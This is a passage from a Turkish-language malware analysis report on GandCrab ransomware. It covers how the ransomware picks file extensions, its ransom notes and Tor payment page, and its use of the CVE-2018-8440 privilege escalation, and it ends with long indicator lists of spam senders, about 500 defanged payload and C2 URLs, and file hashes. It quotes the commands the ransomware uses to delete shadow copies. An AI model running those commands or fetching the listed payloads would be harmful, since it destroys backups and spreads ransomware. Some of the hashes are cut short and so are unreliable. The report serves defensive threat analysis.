Dosya uzantıları ^[A-Z]{5}$ regex ifadesi ile belirlenen 5 karakterlik harfler bütünüdür.


Analiz Raporu




Görsel 72 Dosya uzantılarının beş karakterden oluştuğuna dair ekran görüntüsü

Gandcrab şifrelenecek dosya uzantılarının kontrolünü de gerçekleştirmektedir.

Encrypted olarak tutulan dosya uzantıları aşağıdaki görselde yer alan fonksiyon ile decrypt edilerek belleğe yazılmaktadır.

Görsel 73 Ghidra dosya uzantılarının decrypt edilmesine ait ekran görüntüsü.


Analiz Raporu




Kontrol edilen dosya uzantıları içerisindeki bir ifade dikkat çekmektedir.

Görsel 74 zerophage isimli twitter kullanıcısına yapılan atıf.

“.zerophage_i_like_your_pictures” ifadesi Twitter’da zerophage kullanıcı isimli zararlı yazılım

araştırmacısına yapılan bir göndermedir.

Kontrol edilen tüm dosya uzantıları:

.cab.arj.lzh .tar .7z .gzip .iso .z .7-zip .lzma .vmx .vmdk .vmem .vdi .vbo.1st .602 .docb .xlm .xlsx .xlsm .xltx .xltm .xlsb .xla .xlam .xll .xlw .ppt .pot .pps .pptx .pptm .potx .potm .ppam .ppsx .ppsm .sldx .sldm .xps .xls .xlt ._doc .dotm ._docx .abw .act .adoc .aim .ans .apkg .apt .asc .asc .ascii .ase .aty .awp .awt .aww .bad .bbs .bdp .bdr .bean .bib .bib .bibtex .bml .bna .boc .brx .btd .bzabw .calca .charset .chart .chord .cnm .cod .crwl .cws .cyi .dca .dfti .dgs .diz .dne .dot .doc .docm .dotx .docx .docxml .docz .dox .dropbox .dsc .dvi .dwd .dx .dxb .dxp .eio .eit .emf .eml .emlx .emulecollection .epp .err .err .etf .etx .euc .fadein.template .faq .fbl .fcf .fdf .fdr .fds .fdt .fdx .fdxt .fft .fgs .flr .fodt .fountain .fpt .frt .fwd .fwdn .gmd .gpd .gpn .gsd .gthr .gv .hbk .hht .hs .hwp .hwp .hz .idx .iil .ipf .ipspot .jarvis .jis .jnp .joe .jp1 .jrtf .jtd .kes .klg .klg .knt .kon .kwd .latex .lbt .lis .lnt .log .lp2 .lst .lst .ltr .ltx .lue .luf .lwp .lxfml .lyt .lyx .man .mbox .mcw .md5 .me .mell .mellel .min .mnt .msg .mw .mwd .mwp .nb .ndoc .nfo .ngloss .njx .note .notes .now .nwctxt .nwm .nwp .ocr .odif .odm .odo .odt .ofl .opeico .openbsd .ort .ott .p7s .pages .pages-tef .pdpcmd .pfx .pjt .plain .plantuml .pmo .prt .prt .psw .pu .pvj .pvm .pwd .pwdp .pwdpl .pwi .pwr .qdl .qpf .rad .readme .rft .ris .rpt .rst .rtd .rtf .rtfd .rtx .run .rvf .rzk .rzn .saf .safetext .sam .sam .save .scc .scm .scriv .scrivx .sct .scw .sdm .sdoc .sdw .se .session .sgm .sig .skcard .sla .sla.gz .smf .sms .ssa .story .strings .stw .sty .sublime-project .sublime-workspace .sxg .sxw .tab .tab .tdf .tdf .template .tex .text .textclipping .thp .tlb .tm .tmd .tmdx .tmv .tmvx .tpc .trelby .tvj .txt .u3i .unauth .unx .uof .uot .upd .utf8 .utxt .vct .vnt .vw .wbk .webdoc .wn .wp .wp4 .wp5 .wp6 .wp7 .wpa .wpd .wpd .wpd .wpl .wps .wps .wpt .wpt .wpw .wri .wsd .wtt .wtx .xbdoc .xbplate .xdl .xdl .xwp .xwp .xwp .xy .xy3 .xyp .xyw


Analiz Raporu




.zabw .zrtf .zw .ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .lock .hlp .ldf .icl .icns .ico .ics .lnk .key .idx

.mod .mpa .msc .msp .msstyles .msu .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack

.exe .bat .cmd .gandcrab .KRAB .CRAB .zerophage_i_like_your_pictures

Şifreleme işlemi sonrasında şifrelenen her klasörün içerisine fidye ödemesine dair detayların yer aldığı html ve txt dosyaları oluşturulmaktadır.

Görsel 75


Analiz Raporu




Fidye ödeme detaylarına ait görsel aşağıda yer almaktadır.

Görsel 76 Fidye ödeme detayları

hxxp://gandcrabmmfe6mnef[.]onion/7e410eb420c50d73 TOR ağı adresinden fidye ödemesi yapılmasına yönelik yönergeler yer almaktadır.


Analiz Raporu




İlgili TOR adresine girildiğinde aşağıdaki ekran ile karşılaşılmaktadır.

Görsel 77 GandCrab tor adresi

Gandcrab, tüm işlemleri bitirdikten sonra enfekte cihaza ait shadowcopy bilgilerini silmektedir. Farklı samplelar incelendiğinde bu işlemin iki farklı şekilde yapıldığı görülmüştür.

\wbem\wmic.exe shadowcopy delete \cmd.exe c/ vssadmin delete shadows /all /quiet

Görsel 78 Shadowcopy’nin silinme aşaması.


Analiz Raporu




Yukarıdaki görselde yer alan işlemlerin gerçekleştirilmesine ait kod parçasına aşağıdaki görselde yer verilmiştir.

v5.0.0 üzerinde yapılan incelemeler sırasında GandCrab’in CVE-2018–8440 numaralı ALPC Task Scheduler Local Privilege Exploit’ini kullandığı tespit edilmiştir. İlgili exploit’in zararlı içerisinde kullanıldığı yere dair görsellere aşağıda yer verilmiştir.

Görsel 79 ALPC Task Scheduler Local Privilege Exploitinin kullanıldığı yer.


Analiz Raporu




Yapılan araştırmalar sonucunda ilgili exploit koduna ait kaynak koda erişilmiştir.

Görsel 80 ALPC Task Scheduler Local Privilege Exploitinin kullanıldığı yer.

İlgili exploit’e ait fonksiyonun decompile edilmiş hali aşağıdaki gibidir.

Görsel 81 Exploit fonksiyonuna ait kod parçası


Analiz Raporu




Exploit’e ait kaynak kodlardan bir bölüme aşağıda yer verilmiştir.

Görsel 82 Exploite ait kaynak kodunun bir bölümü.

3) Tehdit Vektörü Göstergeleri (Indicator of Compromises)

a) GandCrab v5.0 Yara kuralı

b) ALPC LPE Exlploit Yara Kuralı


Analiz Raporu




c) Spam Mail Adresleri

S.N. E-Posta Adresi

1 Teddy Bailey <[email protected]>

2 Imogene Carter <[email protected]>

3 Imelda Jones <[email protected]>

4 Ted Hall <[email protected]>

5 Deanne Harris <[email protected]>

6 Bob Ross <[email protected]>

7 Teddy Gonzalez <[email protected]>

8 Bradford Reed <[email protected]>

9 Taylor Phillips <[email protected]>

10 Deena Hernandez <[email protected]>

11 Brandon Clay <[email protected]>

12 Carmen Cresswell <[email protected]>

13 Fredric Elvy <[email protected]>

14 Mayra Mulroney <[email protected]>

15 Maricela Audeley <[email protected]>

16 Megan Ilonka <[email protected]>

17 [email protected]

















mailto:[email protected]































Analiz Raporu




d) Zararlıların İletişime Geçtiği Domain Adresleri

S.N. Domain Adresi

1 dsdfgdfsdegdf[.]ru/20/_outputA19506FRR[.]exe

2 104[.]248[.]163[.]221/lole[.]exe

3 104[.]248[.]163[.]221/tor[.]exe

4 209[.]141[.]56[.]224/youwin[.]exe

5 arcnyc[.]com/youwin[.]exe

6 bats[.]pw/putty[.]exe

7 cmdou[.]com/34wt5ydh45syrth/q3w4ts5/5yedthfvghbj[.]exe

8 karbonkoko[.]com/rundll[.]exe

9 debzaccholkonsult[.]com/rundll[.]exe

10 googletime[.]ac[.]ug/3/_output7A67C50ar[.]exe

11 sicurezza-postepay[.]club/man[.]exe

12 sicurezza-postepay[.]info/man[.]exe

13 sicurezza-postepay[.]pw/man[.]exe

14 sicurezza-postepay[.]site/man[.]exe

15 sicurezza-postepay[.]space/man[.]exe

16 sicurezza-postepay[.]xyz/man[.]exe

17 sicurezza-postepay[.]club/invoice[.]php

18 sicurezza-postepay[.]info/invoice[.]php

19 sicurezza-postepay[.]pw/invoice[.]php

20 sicurezza-postepay[.]site/invoice[.]php

21 sicurezza-postepay[.]space/invoice[.]php

22 sicurezza-postepay[.]xyz/invoice[.]php

23 104[.]248[.]163[.]221/invoice[.]php

24 hmrc-tax[.]xyz/invoice[.]php

25 hmrc-tax[.]xyz/man[.]exe

26 www[.]kakaocorp[.]link/

27 www[.]kakaocorp[.]link/content/images/thrukedaes[.]jpg

28 104[.]244[.]74[.]55/tomandjerry[.]exe

29 92[.]63[.]197[.]153/mcdonalds[.]exe

30 92[.]63[.]197[.]153/s/1[.]exe

31 92[.]63[.]197[.]153/s/2[.]exe

32 92[.]63[.]197[.]153/s/3[.]exe

33 92[.]63[.]197[.]153/s/4[.]exe

34 92[.]63[.]197[.]153/s/5[.]exe

35 checkerrors[.]ug[.]/payload[.]ps1

36 checkerrors[.]ug/gategate[.]php

37 91[.]210[.]104[.]247/update[.]bin

38 ezstat[.]ru/1Rn937

39 www[.]billerimpex[[.]]com


Analiz Raporu




40 www[.]macartegrise[.]eu

41 www[.]poketeg[.]com

42 perovaphoto[.]ru

43 asl-company[.]ru

44 www[.]fabbfoundation[.]gm

45 www[.]perfectfunnelblueprint[.]com

46 www[.]wash-wear[.]com

47 pp-panda74[.]ru

48 cevent[.]net

49 bellytobabyphotographyseattle[.]com

50 alem[.]be

51 boatshowradio[.]com

52 dna-cp[.]com

53 acbt[.]fr

54 wpakademi[.]com

55 www[.]cakav[.]hu

56 www[.]mimid[.]cz

57 6chen[.]cn

58 goodapd[.]website

59 oceanlinen[.]com

60 tommarmores[.]com[.]br

61 nesten[.]dk

62 zaeba[.]co[.]uk

63 www[.]n2plus[.]co[.]th

64 koloritplus[.]ru

65 h5s[.]vn

66 marketisleri[.]com

67 www[.]toflyaviacao[.]com[.]br

68 www[.]rment[.]in

69 www[.]lagouttedelixir[.]com

70 www[.]krishnagrp[.]com

71 big-game-fishing-croatia[.]hr

72 mauricionacif[.]com

73 www[.]ismcrossconnect[.]com

74 aurumwedding[.]ru

75 test[.]theveeview[.]com

76 relectrica[.]com[.]mx

77 bethel[.]com[.]ve

78 vjccons[.]com[.]vn

79 bloghalm[.]eu

80 cyclevegas[.]com

81 royal[.]by

82 www[.]himmerlandgolf[.]dk


Analiz Raporu




83 hoteltravel2018[.]com

84 picusglancus[.]pl

85 unnatimotors[.]in

86 krasnaypolyana123[.]ru

87 smbardoli[.]org

88 blokefeed[.]club

89 evotech[.]lu

90 devdev[.]com[.]br

91 graftedinn[.]us

92 top-22[.]ru

93 simetribilisim[.]com

94 sherouk[.]com

95 lucides[.]co[.]uk

96 hanaglobalholding[.]com

97 diadelorgasmo[.]cl

98 www[.]groupwine[.]fr

99 mrngreens[.]com

100 www[.]cognitiasystems[.]com

101 canhoopalcity[.]top

102 greatmiddleeastgate[.]com

103 xn — 80adsn2ag7e[.]xn — p1ai

104 www[.]reusa[.]com[.]br

105 xn — 80avc1e[.]xn — p1acf

106 www[.]christinapetrou[.]co[.]uk

107 www[.]lyonwood[.]co[.]uk

108 www[.]urstoothfully[.]com

109 faculdadesenacpe[.]edu[.]br

110 dijitalharf[.]com

111 www[.]maraeeventos[.]com[.]br

112 www[.]chanandeayrs[.]com

113 idclamart[.]fr

114 www[.]batisigortaaydin[.]com

115 muxtay[.]com

116 kubatom[.]com

117 sweetthirty[.]pl

118 onstaheerd[.]nl

119 kakaocorp[.]link

120 jamgonkongtrul[.]org[.]tw

121 barbochos[.]com

122 rayanaco[.]ir

123 obed-service[.]ru

124 500flats[.]com

125 www[.]lasertag[.]kiev[.]ua


Analiz Raporu




126 gstelecom[.]cf

127 www[.]ikebana[.]cat

128 gites-les-noisetiers[.]fr

129 www[.]kia1[.]ir

130 m-award[.]com

131 intervener[.]org

132 sxhfhr[.]ga

133 soldiergym[.]nl

134 fitforms[.]mx

135 www[.]cornishinn[.]com

136 riib[.]com[.]pl

137 evaskinclinic[.]com

138 www[.]kuntoaskel[.]net

139 ecart[.]nu

140 www[.]phammemviet[.]com

141 www[.]clarusdent[.]com

142 www[.]lasthotel[.]it

143 www[.]htsinteriors[.]com

144 kwanho[.]com[.]au

145 importec[.]com[.]mx

146 www[.]xn — narmdnsalonlar-fjb55aa34dpkdo[.]com

147 klongpleng[.]com

148 cocnguyetsanthaomeo[.]com

149 wakeupwithmakeup[.]co[.]uk

150 www[.]jtaobk[.]com

151 mundololita[.]es

152 denaseguridad[.]com

153 inescogroup[.]com

154 www[.]velvet[.]travel

155 myartstudio[.]com[.]my

156 www[.]financetoit[.]fr

157 sigillum[.]com[.]ua

158 www[.]friends-for-kids[.]de

159 www[.]pgregoire[.]com

160 babiceresa[.]com

161 vinhomescangio[.]viethomes[.]land

162 heartsongroup[.]com

163 top-prodazha[.]ru

164 kalemon[.]net

165 www[.]tikura[.]com[.]br

166 www[.]riadtroiscours[.]com

167 videirafilho[.]com[.]br

168 vtr[.]kz


Analiz Raporu




169 peritocaligrafosevilla[.]es

170 umrezamani[.]net

171 www[.]bsecure[.]fr

172 www[.]setiri[.]com

173 www[.]fondsbn[.]com

174 optikchrtek[.]yourcloud[.]cz

175 www[.]sva-co[.]ir

176 www[.]classtransport[.]fr

177 pearlandshandyman[.]com

178 toponlinegames[.]pro

179 www[.]interiorideas9[.]com

180 www[.]cyrillecharro[.]com

181 www[.]romanjews[.]com

182 alatkeselamatankerja[.]co

183 mcsiweb[.]com

184 www[.]monei[.]co

185 www[.]conversants[.]com

186 pro-markservicesinc[.]com

187 thtcannabis[.]com

188 novocentropetrolina[.]com

189 bharatfolks[.]com

190 www[.]cheriehavetoshine[.]com

191 www[.]ossainicholasossai[.]com

192 www[.]sgfcomputers[.]ro

193 sinuverde[.]com

194 www[.]senteks[.]com

195 www[.]megawheyprotein[.]com

196 www[.]speardigitalweb[.]com

197 www[.]101[.]sr

198 dutchtraditions[.]nl

199 barvybud[.]com

200 thillaikalavathi[.]info

201 parsmoviez[.]com

202 ogenconsult[.]com

203 mdc-coaching[.]fr

204 finamlight[.]ru

205 atayastore[.]com

206 www[.]thatscomfortable[.]com

207 www[.]colorshotevents[.]com

208 ananas[.]kiev[.]ua

209 www[.]bitwiseacademy[.]com

210 sbobetcasinoterpercaya[.]com

211 upm-apply[.]com


Analiz Raporu




212 carillon7tanphu[.]com

213 gofootball24h[.]com

214 miriamkapner[.]com

215 onedev[.]ro

216 www[.]alanya[.]co[.]uk

217 unitedctg[.]com

218 ioae[.]com[.]vn

219 startcomputer[.]com[.]br

220 aldrovanaluxe[.]lviv[.]ua

221 meblivdim[.]org

222 www[.]transento[.]com

223 www[.]parthabarua[.]com

224 rbctoken[.]com

225 sonnewton[.]com

226 www[.]santischerd[.]com

227 0123porno[.]com

228 5[.]77[.]60[.]222

229 180[.]211[.]99[.]165

230 aldirgayrimenkul[.]com

231 103[.]253[.]1[.]219

232 abidhandicraft[.]com

233 androsoft[.]in

234 128[.]199[.]96[.]238

235 argedalatpars[.]ir

236 179[.]188[.]17[.]9

237 basketkids[.]com[.]ua

238 avangardstone[.]com

239 autumnnight[.]cz

240 alauddintakeaway[.]com

241 androturk[.]club

242 badmos[.]top

243 barquestest9[.]uk

244 boucherie[.]lemarchefrais[.]com

245 baranacarpet[.]com

246 anowaragroupbd[.]com

247 blog[.]betzest[.]com

248 anvatbinhduong[.]com

249 bmafrique[.]com

250 amardin[.]com

251 airybd[.]com

252 cadretoiles[.]com

253 awrbloooomdevserver[.]com

254 bluebellhdb[.]com


Analiz Raporu




255 ce-clp[.]fr

256 charm[.]andreea[.]alexandroni[.]ro

257 atlantisbuildcon[.]com

258 blog[.]raztype[.]com

259 chatrashow[.]com

260 blog[.]swingtaiwan[.]com

261 call4soft[.]com

262 bloomingrosebd[.]com

263 bhbeautyempire[.]com

264 acasadocarro[.]com[.]br

265 casualflirtings[.]com

266 blog[.]damngood[.]mx

267 carlylevanlines[.]com

268 conexa[.]no

269 cashback[.]ncplinc[.]net

270 creditmarketplace[.]eu

271 brightenceiling[.]com[.]hk

272 asiapointpl[.]com

273 cityclosetselfstorage[.]com

274 customroms[.]cba[.]pl

275 daoudi-services[.]com

276 cleartripcustomercare[.]com

277 dejting[.]party

278 coreserv[.]pixelsco[.]com

279 dneprsemena[.]com

280 azulproducciones[.]com[.]gt

281 drummelo[.]altervista[.]org

282 danialent[.]com

283 deneme2[.]bokshaber[.]net

284 bdot[.]co[.]kr

285 efacile[.]biz

286 dymoetiketler[.]com

287 dev[.]beverlywilshiremedical[.]com

288 electrobox[.]org

289 e-przepisy[.]cba[.]pl

290 doktergigimuda[.]com

291 dsc[.]integralmea[.]info

292 envirobostad[.]se

293 establecimientos[.]sintinovoy[.]sevapp20[.]com

294 doglabs[.]com[.]br

295 eyh[.]org[.]tr

296 conthoi[.]ga

297 enestar[.]es


Analiz Raporu




298 aistockpick[.]com

299 farynskiprzemek[.]cba[.]pl

300 ethrx[.]org

301 emilyshope[.]org

302 103[.]254[.]113[.]170

303 eye-doctor[.]mobi

304 freespiritgroup[.]altervista[.]org

305 cnctechservicos[.]com[.]br

306 flows[.]mobi

307 dogcatpetshop[.]life

308 gabinetszott[.]cba[.]pl

309 gianlucafiorino1[.]altervista[.]org

310 chinhung[.]info

311 eunos8[.]com

312 fotopsy[.]cba[.]pl

313 faraos[.]foco[.]cl

314 gmstroy[.]com

315 giargianes[.]altervista[.]org

316 flccgilumbria[.]it

317 francis-china[.]com

318 hariominteriordecorators[.]com

319 fertilidadpma[.]com

320 giftmaster[.]ml

321 goleelanau[.]com

322 ebsolute[.]com

323 grilledcheesereviews[.]com

324 getagriptraction[.]com

325 editoraplanmark[.]com[.]br

326 blog[.]ruichuangfagao[.]com

327 gypsysoulsonfire[.]com

328 datalystsystems[.]com

329 hourliapp[.]com

330 35[.]184[.]187[.]178

331 featherenterprising[.]com

332 interflower[.]ee

333 hownottocatchacold[.]com

334 irantbt[.]com

335 jak-sie-opalac[.]cba[.]pl

336 istanbul212tesisat[.]com

337 jeeping-ug[.]ru

338 aesimoveis[.]imb[.]br

339 jiletlitelmakinasi[.]com

340 kabiledans[.]com


Analiz Raporu




341 hopcentury[.]com

342 gfj[.]adv[.]br

343 kameleon-restauracja[.]cba[.]pl

344 kaffekanna[.]no

345 kancelaria-crm[.]pl

346 informatica[.]uss[.]cl

347 harrisheatpumps[.]nz

348 kekti[.]com

349 homemingjiang[.]com

350 karatstreet[.]com

351 krdstud[.]ru

352 kmpoznan[.]cba[.]pl

353 hrd[.]gov[.]co

354 ijzsz[.]com

355 cqfsbj[.]cn

356 graminrajasthan[.]allappshere[.]in

357 harryfang[.]com

358 itsupplier[.]com[.]au

359 low-carb-rezept[.]com

360 cscig[.]ase[.]ro

361 lucianocellitancredi[.]com

362 lloyd[.]www[.]creative-platform[.]net

363 kinhmatgiao[.]com

364 khabardarexpress[.]com

365 kiemdinh345[.]com

366 imazineex[.]com

367 marbleentreprise[.]dk

368 bsp[.]co[.]id

369 klangplaza[.]com

370 marcora[.]it

371 masp[.]pro

372 ma-redactrice-web[.]com

373 kittipakdee[.]com

374 marmet[.]cba[.]pl

375 life[.]demobb[.]com

376 kssyn[.]com

377 meditec[.]ma

378 mellon[.]ir

379 mainlis[.]pt

380 maxibud[.]cba[.]pl

381 merittur[.]com

382 luatsuhaiduong[.]com

383 lgg[.]adv[.]br


Analiz Raporu




384 mranalyz[.]com

385 moika[.]kg

386 muaithai[.]pl

387 jupiter[.]csit[.]rmit[.]edu[.]au

388 mugituz[.]com

389 modivi[.]hu

390 nahalbazr[.]com

391 lanxiaoyang[.]com

392 mengxiao7[.]com

393 mygembest[.]com

394 mskcontracting[.]ca

395 novosti-danasnje[.]info

396 mazjackson[.]com

397 grupoperfetto[.]com[.]br

398 ncrjobs[.]info

399 icebergillusion[.]com

400 nazareimoveis[.]vistatemporario[.]com[.]br

401 nilhair[.]com

402 oral[.]co[.]il

403 orthodontics[.]ir

404 ldm[.]littlerocknews[.]org

405 naizamdistributor[.]com

406 noahs-earth[.]com

407 openricostruzioneabruzzo[.]piattaforma[.]eu

408 oceanstockfilms[.]com

409 onlineitshop[.]com

410 naraveesurgerythailand[.]com

411 njrior[.]cn

412 peakmedia[.]se

413 haircb[.]com

414 nuzululmastah[.]com

415 nurfian[.]ukmforum[.]com

416 plataformacontralaprivatizaciondelcyii[.]org

417 ps-photo[.]ru

418 omahpoetih[.]com

419 paytrenkeren[.]xyz

420 ralienglish[.]com

421 phuongthaoland[.]com

422 nordestinasat[.]com[.]br

423 ratmfan[.]cba[.]pl

424 postit[.]angryventures[.]com

425 pittsburghbbq[.]com

426 saadetankaravekil[.]com


Analiz Raporu




427 sahandnetcctv[.]com

428 shalvak[.]com

429 saids-edu[.]com

430 plasaponsel[.]com

431 shakingflames[.]com

432 shop[.]istest[.]ir

433 skutsje-gruttepier[.]nl

434 skbyd[.]cba[.]pl

435 sokolenko[.]dp[.]ua

436 protesesdeflex[.]com[.]br

437 saudigeriatrics[.]org

438 snejankagd[.]com

439 social[.]takeshopv[.]pp[.]ua

440 erikherrstrom[.]com

441 san-kelloff-italy[.]web5s[.]com

442 kuatsolar[.]kz

443 skilldealer[.]fr

444 lemdik[.]polri[.]go[.]id

445 studiodelcarratore[.]it

446 sportsohio[.]pbd-dev[.]com

447 megexinc[.]com

448 sinergiindonesia[.]co[.]id

449 smmakcreation[.]com

450 solardosing[.]ir

451 stoveworlddirect[.]co[.]uk

452 sinfonia[.]vn

453 tala[.]today

454 locnuockimnguyenphat[.]com[.]vn

455 test[.]assistia[.]se

456 test[.]indigo-experten[.]be

457 saberes[.]cl

458 test[.]mirari[.]pl

459 test[.]patemucevherat[.]com

460 thepinspire[.]co[.]uk

461 syjingermei[.]xyz

462 sulawan[.]com

463 torstenbygger[.]se

464 sites[.]blueskydigital[.]com[.]au

465 theaceexports[.]com

466 stivesofminthill[.]com

467 unicef-int[.]karibuni[.]be

468 uatwebsite[.]aithent[.]com

469 villagevanguard[.]co[.]uk


Analiz Raporu




470 atelierdupain[.]it

471 violetdecor[.]net

472 vancouvereventvideo[.]com

473 vuraldirek[.]com

474 vlawcourse[.]com

475 white-power-music[.]cba[.]pl

476 worldgamifier[.]com

477 visahousebangladesh[.]com

478 wp[.]mmitest[.]fr

479 vietx[.]us

480 weihnachts-pyramide[.]tk

481 workcompoptions[.]com

482 wp[.]actions[.]men

483 webmarketing[.]cinfoway[.]in

484 ustunbey[.]com

485 whmhost[.]tk

486 voiceyouropinions[.]net

487 vipyouxi[.]net

488 www[.]armangarayan[.]com

489 mas-expert[.]com

490 vitoriainvest[.]com[.]br

491 www[.]consulpyme[.]biz

492 www[.]equi[.]nl

493 keller-fenster[.]ch

494 www[.]anhphuoc[.]com[.]vn

495 roue[.]com[.]mx

496 www[.]cerespire[.]com

497 www[.]fratelliditalia[.]it

498 www[.]asiapointpl[.]com

499 www[.]dpsdhuri[.]edu[.]in

500 www[.]aftvec[.]com

e) Analiz Edilen Dosyalara Ait Özet Değeri (Hash) Bilgileri

S.N. Özet Değeri 1 623f558a50bb665a15f50121d0b7a8b54d90108c35e2787f2576016f3fe74dd8

2 d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0

3 b4b6f6c2588001e5b95eed79faf99a92b9d9224f65af6a92e055ddfb14

4 063cf82cd52acb6a0539a6ff59f72fb5de473293a06c470a92c6d35a15

5 ed8875c88bf061f45601629fbb3faa9f5b9ea4a076ba5a7accd566dc40

6 e7851a1b3e93968e7f6b92a1a3f59d250402be15a5bcb3262acff1e0a2

7 6a8d922e34de35ac074b7de54d71227fb1a1ed92b9cfbc4daf8d64a9c5

8 67c50459db7f0042d7e1a96ce113e60f0179978dfe810bdb0f5320a092

9 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b7


Analiz Raporu




10 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6

11 b4d0b03ca50f013b4f0f9efc2ecd822bfc13325356100f2f4d36eaf217

12 be54bb05adbda29316ba03d61b3365d8a03e1121a39ae492078787aff4

13 589e188602c4a24c68bc095c1105894a5e97e1df6218eaead89b7ab9a4e88eac

14 69f55139df165bea1fcada0b0174d01240bc40bc21aac4b42992f2e0a0c2ea1d

15 ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51


17 6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501

18 692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08

19 ad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c

20 3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e

21 521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d

22 9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6

23 27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad

24 ce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706

25 0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5

26 07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257

27 0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e

28 812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0

29 d25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a

30 ee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55

31 ab0819ae61ecbaa87d893aa239dc82d971cfcce2d44b5bebb4c45e66bb32ec51

32 3c60a9af0f5538f3bca64a1df5c604a6d194495d8d5a66bcd1a4f09b84015ebb

33 37e660ada1ea7c65de2499f5093416b3db59dfb360fc99c74820c355bf19ec52

34 222ac1b64977c9e24bdaf521a36788b068353c65869469a90b0af8d6c4060f8a

35 cf104f2ad205baee6d9d80e256201ef6758b850576686611c355808a681bec60

36 8ecbfe6f52ae98b5c9e406459804c4ba7f110e71716ebf05015a3a99c995baa1

37 6c1ed5eb1267d95d8a0dc8e1975923ebefd809c2027427b4ead867fb72703f82

38 c9941b3fd655d04763721f266185454bef94461359642eec724d0cf3f198c988

39 0c0def0788b5f946bb2d1a83d883d474550353c98eaffb4456d651cb4bcc3bd9


41 99eb1d90eb5f0d012f35fcc2a7dedd2229312794354843637ebb7f40b74d0809

42 846ad2d7e1e133ae4bc2decbc22ae686a44cccaffbee15b4d9b23143f6aa8d3f

43 f93379f495ce3c025b8f2ad59779d2de28f00a25b6206572522a71028f925f01

44 8a1e66b4834499dacc24abb27733c387733d919070fc504b14ee865678952559

45 e9bfa9691b48a75fa917a37290cb32b02ded3ae60dab4bcd625e8f390fd345a1

46 786e3c693fcdf55466fd6e5446de7cfeb58a4311442e0bc99ce0b0985c77b45d

47 ef7b107c93e6d605a618fee82d5aeb2b32e3265999f332f624920911aabe1f23

48 06ee45a770fa1a88b62d28059c2c44310f7ff56edbdaf35a0b9c44f2a4e57536

49 f5e74d939a5b329dddc94b75bd770d11c8f9cc3a640dccd8dff765b6997809f2

50 d77378dcc42b912e514d3bd4466cdda050dda9b57799a6c97f70e8489dd8c8d0

Zararlı Yazılım - STM · 2019-04-17 · Gandcrab fidye yazılımının Tor ağı üzerinde...

Documents

Transcript of Zararlı Yazılım - STM · 2019-04-17 · Gandcrab fidye yazılımının Tor ağı üzerinde...